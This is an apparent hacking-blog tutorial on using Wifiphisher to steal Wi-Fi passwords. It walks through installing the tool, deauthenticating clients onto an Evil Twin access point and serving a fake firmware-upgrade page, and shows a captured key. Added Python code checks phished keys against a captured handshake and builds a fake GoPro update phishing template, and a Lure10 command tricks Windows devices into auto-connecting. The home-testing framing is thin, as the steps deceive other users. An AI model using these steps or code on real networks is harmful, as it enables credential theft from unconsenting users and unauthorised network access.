Hack Wi-Fi Networks Without Cracking Wifiphisher
Welcome back. In the last wireless hacking tutorial we talked a little about cracking WPA/WPA2 passphrases using brute-force methods. In this tutorial, Hack Wi-Fi Networks Without Cracking Wifiphisher, we will talk about attacking WPA/WPA2 networks without brute force at all. By creating an Evil Twin access point that mimics a nearby wireless access point we can trick clients into connecting to it and leaking their credentials.
What is Wifiphisher
Wifiphisher is a wireless security tool that mounts automated, victim-customized phishing attacks against Wi-Fi clients in order to obtain credentials or infect the target machine with malware. It is a social engineering attack that can quickly trick the target into unknowingly handing over their password; unlike the methods in the previous tutorial it does no brute forcing of any kind. It is a quick and easy way of obtaining credentials from captive portals and third-party login pages (e.g. social networks) or WPA/WPA2 pre-shared keys.
Wifiphisher works on Kali Linux and is licensed under the GPL license.
Let's assume we are testing the security of our home network. We have turned off WPS and taken all the precautions to safeguard the network against attackers, and we have set a strong passphrase on the access point to defeat brute-force attacks. But other people use the same network from other devices, and any of them could leak the passphrase through human error. This wireless attack relies on a little deception and trickery.
We can use Wifiphisher to trick those clients into openly, and unknowingly, handing over their wireless passphrase and other sensitive information.
To install Wifiphisher, clone the repository with git. In a new terminal run the following commands to download and install it:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
(python setup.py build && python setup.py install does the same thing in two explicit steps; the install step needs root.)
After setup.py has finished unpacking and installing its resources we can start Wifiphisher. Before that, make sure the requirements are met:
1x wireless interface that supports AP mode (Wifiphisher hosts the Evil Twin on it).
1x wireless interface that supports monitor mode and packet injection (used to deauthenticate clients).
Kali Linux or another Linux operating system.
A single adapter that supports both AP and monitor mode can also be used on its own.
First of all, scan the nearby access points; we are looking for a wireless network that has clients connected to it, since this attack needs a client to phish.
Start Wifiphisher with the wifiphisher command that setup.py installed (run it as root), or alternatively run python bin/wifiphisher from the directory Wifiphisher was cloned into.
Specifying wireless interfaces: when Wifiphisher starts it will normally pick the network interfaces to use automatically, but with the options below we can choose them explicitly.
Open a new terminal and cd to the directory where Wifiphisher was downloaded, then start it, replacing wlan1 and wlan2 with the names of your wireless interfaces:
python bin/wifiphisher -aI wlan1 -jI wlan2
(-aI = the AP interface that hosts the Evil Twin; -jI = the jamming interface, put into monitor mode for deauthentication.)
Wifiphisher will now start scanning for wireless networks. From the network list choose the target wireless network using the up and down keys; when you have found the target network press Enter.
A list of phishing scenarios will appear. I will use 10, "Firmware Upgrade Page": it displays a router configuration page without any logos or branding that asks for the WPA/WPA2 network password because of a firmware update.
(When you first load Wifiphisher you will only have a few phishing scenarios to choose from. I have added many to my list over time, so don't worry if your list does not look like the one in the screenshot; adding extra phishing scenarios is covered later in the tutorial.)
After a phishing scenario is selected, Wifiphisher starts the Evil Twin access point and spawns a listener that serves the phishing page. Clients connected to the real wireless network are repeatedly deauthenticated by Wifiphisher; the Evil Twin is an open network carrying the same name, so when the user reconnects they land on it instead of the real access point.
The screenshot below shows the target client authenticating to the Evil Twin hotspot created by Wifiphisher.
After the client joins the Evil Twin, any website the target tries to open in the web browser is redirected to a fake page prompting for credentials; the Evil Twin answers every request with the phishing page, the same way a captive portal does.
The screenshot below shows which clients are being deauthenticated by Wifiphisher; on the right-hand side we can see the Evil Twin access point it created and which channel and interface it is running on.
The HTTP requests section shows which sites connected clients are requesting; instead of loading the site the target asked for, the fake phishing page generated by Wifiphisher appears.
GET = pages the clients are requesting.
POST = form submissions from connected clients. Lines tagged POST show the data the target has sent over the network, including anything typed into the phishing page.
The POST request in the screenshot below shows the credential captured through the form field wfphshr-wpa-password: the target has entered the wireless key "PRESH4REDK3Y". Nothing in this flow checks that the victim typed the real key correctly, so a phished passphrase should be verified, against a captured 4-way handshake or simply by connecting to the real AP, before it is relied on.
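The verification step described above, as an added example that is not part of the original page or of Wifiphisher itself: the phished passphrase is checked offline against a captured 4-way handshake the way aircrack-ng does, by deriving the PMK and PTK and recomputing the MIC of EAPOL-Key message 2. The MAC addresses, nonces and EAPOL frame are constructed inside the block for illustration; the PMK test vector is the published IEEE 802.11 one.

```python
"""Verify a phished WPA/WPA2 passphrase against a captured 4-way handshake.

Added example for this page, not Wifiphisher's own code. A phished key is
only useful if the victim typed it correctly, so check it offline: derive
the PMK and PTK, recompute the MIC of handshake message 2 and compare it
with the captured one. The MAC addresses, nonces and EAPOL frame below are
constructed for illustration.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # IEEE 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || counter) blocks, concatenated
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def compute_mic(kck: bytes, eapol_zeroed: bytes, version: int) -> bytes:
    # Key descriptor version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits
    if version == 1:
        return hmac.new(kck, eapol_zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def verify_passphrase(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                      anonce: bytes, snonce: bytes, eapol: bytes) -> bool:
    """True if the passphrase reproduces the MIC carried in EAPOL-Key message 2."""
    version = eapol[6] & 0x07                      # low 3 bits of the Key Information field
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]   # MIC field zeroed for computation
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return hmac.compare_digest(compute_mic(kck, zeroed, version), captured_mic)


def build_message2(snonce: bytes, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    # EAPOL-Key message 2 of 4 (client -> AP), WPA2 layout, as a sniffer would see it (constructed)
    body = (b"\x02"                        # descriptor type: RSN
            + b"\x01\x0a"                  # key info: version 2, pairwise, MIC bit set
            + b"\x00\x10"                  # key length
            + (1).to_bytes(8, "big")       # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, key RSC, key ID
            + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, packet type 3 = EAPOL-Key


def build_sample_capture(passphrase: str, ssid: str) -> dict:
    """Constructed handshake for a known passphrase, so the verifier can be exercised offline."""
    ap_mac, client_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_data = b"\x30\x14" + bytes(20)    # placeholder RSN IE
    unsigned = build_message2(snonce, key_data)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    signed = build_message2(snonce, key_data, compute_mic(kck, unsigned, 2))
    return dict(ssid=ssid, ap_mac=ap_mac, client_mac=client_mac, anonce=anonce, snonce=snonce, eapol=signed)


if __name__ == "__main__":
    # Published IEEE 802.11 test vector: passphrase "password", SSID "IEEE"
    assert pmk_from_passphrase("password", "IEEE").hex().startswith("f42c6fc52df0ebef")
    capture = build_sample_capture("PRESH4REDK3Y", "HomeNetwork")
    print("phished key verified:", verify_passphrase("PRESH4REDK3Y", **capture))   # True
    print("mistyped key verified:", verify_passphrase("PRESH4REDKEY", **capture))  # False
```

On a real engagement the nonces, MACs and EAPOL frame come from a pcap of the handshake captured on the monitor interface during the deauthentication; the derivation itself is the same, and a mismatch means the victim typed something other than the real key.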
We have now successfully phished a wireless network passphrase using Wifiphisher. A fresh install contains only a few phishing scenarios, but don't worry: new phishing pages can be added, and we can even create our own templates.
Installing Extra Phishing Scenario Pages
When you first install Wifiphisher you will notice that there are only a few phishing scenarios to choose from; for whatever reason, you may want to add your own pages. The steps are:
1. Download the web page
2. Copy the web page into Wifiphisher
3. Edit the HTML to suit Wifiphisher's configuration
4. Create a config file (this integrates our page into Wifiphisher's menu)
Downloading Web Pages from Linux Terminal
wget -E -H -k -K -p <insert URL here>
wget --page-requisites --https-only -K --no-clobber https://hackingvision.com
What these wget options do:
-E, --adjust-extension   save HTML/CSS documents with proper extensions
-H, --span-hosts         go to foreign hosts when recursive
-K, --backup-converted   before converting file X, back it up as X.orig
-k, --convert-links      make links in downloaded HTML or CSS point to local files
-p, --page-requisites    get all images, CSS and other page requisites needed to display the page
You can also create your own templates in HTML and CSS and add the form attributes yourself; Wifiphisher serves the template as static files, so server-side code such as PHP will not run. This is a quick way of creating new compatible templates. In older versions of Wifiphisher the form field names had to carry the wfphshr- prefix (as in wfphshr-wpa-password above); newer versions accept any field name.
Open the directory the script was downloaded into and navigate to wifiphisher/wifiphisher/data/phishing-pages. Each template lives in its own folder there; folder names must be lowercase letters without spaces, for example "my-phishing-page".
Let's take a closer look at the configuration files. They are how Wifiphisher adds new phishing scenarios to its menu without the script itself being edited; the screenshot below shows the structure of a phishing template directory.
Each template has its own config.ini; these files describe the template and add it to Wifiphisher's menu. Below is an example configuration file: simply give the template a name and add a description. The context entries can be removed if you wish without affecting the script's ability to run, or edited to suit the target AP vendor.
Name: Firmware Upgrade Page
Description: A router configuration page without logos or brands asking for WPA/WPA2 password due to a firmware upgrade. Mobile-friendly.
# Comment in the line below to override automatic vendor detection
# target_ap_vendor: AP_VENDOR
As an example I have added a GoPro camera phishing page prompting for an important update.
The screenshot below shows credentials gathered by the fake GoPro page.
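The four steps above, carried out for a GoPro-style page, as an added example that is not part of the original page or of Wifiphisher's own code. It writes a scenario folder with the config.ini shown above and an html/index.html containing the form, enforces the lowercase-without-spaces folder rule, and then checks the result the way the menu loader would need it. The [info] section header and the html/ subfolder are assumed to match Wifiphisher's bundled templates; the wfphshr-wpa-password field name is the one visible in the POST capture earlier on this page.

```python
"""Scaffold and sanity-check a Wifiphisher phishing-scenario directory.

Added example for this page, not Wifiphisher's own code. It follows the
layout the tutorial describes: one folder per scenario under
wifiphisher/data/phishing-pages/, a config.ini carrying Name and
Description, and the page itself under html/index.html with a form that
POSTs back to the portal. The [info] section header and the html/ subfolder
are assumptions about Wifiphisher's template layout.
"""
import configparser
import re
import tempfile
from pathlib import Path
from typing import Optional

FOLDER_RE = re.compile(r"^[a-z]+(?:-[a-z]+)*$")  # lowercase letters and hyphens, no spaces

INDEX_HTML = """<!doctype html>
<html><head><meta charset="utf-8"><title>{name}</title></head>
<body>
<h1>{name}</h1>
<p>{description}</p>
<form method="post" action="">
  <label>WPA/WPA2 password <input type="password" name="wfphshr-wpa-password"></label>
  <input type="submit" value="Continue">
</form>
</body></html>
"""


def is_valid_folder_name(folder: str) -> bool:
    return bool(FOLDER_RE.match(folder))


def render_config(name: str, description: str, vendor: Optional[str] = None) -> str:
    # Mirrors the config.ini shown above; target_ap_vendor stays commented out unless forced
    vendor_line = f"target_ap_vendor: {vendor}" if vendor else "# target_ap_vendor: AP_VENDOR"
    return "\n".join([
        "# Config file for this phishing scenario ([info] section assumed)",
        "[info]",
        f"Name: {name}",
        f"Description: {description}",
        "# Comment in the line below to override automatic vendor detection",
        vendor_line,
    ]) + "\n"


def create_scenario(pages_root: Path, folder: str, name: str, description: str,
                    vendor: Optional[str] = None) -> Path:
    """Write <pages_root>/<folder>/config.ini and html/index.html; rejects bad folder names."""
    if not is_valid_folder_name(folder):
        raise ValueError(f"folder name must be lowercase letters/hyphens without spaces: {folder!r}")
    scenario = pages_root / folder
    (scenario / "html").mkdir(parents=True, exist_ok=False)
    (scenario / "config.ini").write_text(render_config(name, description, vendor))
    (scenario / "html" / "index.html").write_text(INDEX_HTML.format(name=name, description=description))
    return scenario


def validate_scenario(scenario: Path) -> dict:
    """Check the template has what the menu needs, and list the form fields that will show up in POST logs."""
    cfg = configparser.ConfigParser()
    if not cfg.read(scenario / "config.ini") or "info" not in cfg:
        raise ValueError("config.ini missing or has no [info] section")
    name, description = cfg["info"].get("name"), cfg["info"].get("description")
    if not name or not description:
        raise ValueError("config.ini needs both Name and Description")
    html = (scenario / "html" / "index.html").read_text()
    if not re.search(r'<form[^>]*method="post"', html, re.IGNORECASE):
        raise ValueError("index.html must contain a form that POSTs back to the portal")
    fields = re.findall(r'<input[^>]*name="([^"]+)"', html, re.IGNORECASE)
    if not fields:
        raise ValueError("form has no named inputs, so nothing would appear in the POST log")
    return {"folder": scenario.name, "name": name, "description": description, "fields": fields}


def demo() -> dict:
    """Create and validate a GoPro-style scenario in a temporary phishing-pages tree (constructed data)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wifiphisher" / "data" / "phishing-pages"
        scenario = create_scenario(root, "gopro-update", "GoPro Update",
                                   "Fake GoPro camera page asking for the Wi-Fi password before an important update.")
        return validate_scenario(scenario)


if __name__ == "__main__":
    print(demo())
```

Point pages_root at the real wifiphisher/wifiphisher/data/phishing-pages directory (instead of the temporary tree used by demo) to have the scenario appear in the menu on the next start; keep the assumed pieces in line with whatever the bundled templates in your installed version actually use.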
Wifiphisher also supports Lure10 attacks.
Lure10 makes nearby Windows devices believe they are within an area that was previously captured (the area file passed to --lure10-exploit below).
Wifiphisher broadcasts beacon frames mimicking the access points recorded in that area, which fools the Windows Location Service into believing the device is there; because Windows has a WLAN tagged as WiFi Sense recorded for that location, it auto-connects to an open network carrying that ESSID without any user interaction.
To use the Lure10 exploit, run the following command:
python bin/wifiphisher --lure10-exploit area_20170414_123200 --essid "WiFiSense-Tagged-WLAN"
The --essid option can also be used on its own to give the Evil Twin access point a specific name.
Thanks for supporting HackingVision. If you enjoyed this article, Hack Wi-Fi Networks Without Cracking Wifiphisher, consider sharing it with friends.